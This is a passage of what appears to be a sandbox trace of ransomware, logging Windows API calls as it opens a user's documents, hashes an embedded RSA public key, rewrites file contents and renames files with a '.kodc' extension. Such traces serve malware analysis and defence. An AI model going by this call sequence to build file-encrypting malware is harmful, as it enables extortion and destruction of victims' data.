(HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab98 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab68 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.725] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18449, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.725] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.725] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.725] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.725] CloseHandle (hObject=0x5cc) returned 1 [0098.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0098.737] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\trReD 97LkQS3Hk3.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\trred 97lkqs3hk3.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\trReD 97LkQS3Hk3.odt.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\trred 97lkqs3hk3.odt.kodc")) returned 1 [0098.739] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3fadd0, ftCreationTime.dwHighDateTime=0x1d5bc65, ftLastAccessTime.dwLowDateTime=0x36a1eb00, ftLastAccessTime.dwHighDateTime=0x1d5b924, ftLastWriteTime.dwLowDateTime=0x36a1eb00, ftLastWriteTime.dwHighDateTime=0x1d5b924, nFileSizeHigh=0x0, nFileSizeLow=0x1025d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-aMqijoSKbxYaw.doc", cAlternateFileName="U-AMQI~1.DOC")) returned 1 [0098.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.739] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u-aMqijoSKbxYaw.doc") returned=".doc" [0098.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u-aMqijoSKbxYaw.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u-amqijoskbxyaw.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.739] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=66141) returned 1 [0098.739] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.742] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10237, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.743] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.743] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x1025d, lpOverlapped=0x0) returned 1 [0098.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.744] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.744] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.745] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.745] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.745] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.745] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.745] GetLastError () returned 0x0 [0098.745] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.746] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.746] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.746] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.746] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.746] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10260) returned 0x9ba4d90 [0098.746] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d570 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab38 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d5b8 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab50 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.747] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331ab98 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331ab80 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab98 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.749] GetCurrentThreadId () returned 0x42c [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8f628 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.749] GetCurrentThreadId () returned 0x42c [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab98 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab68 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331abb0 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ab80 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331ab80 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: 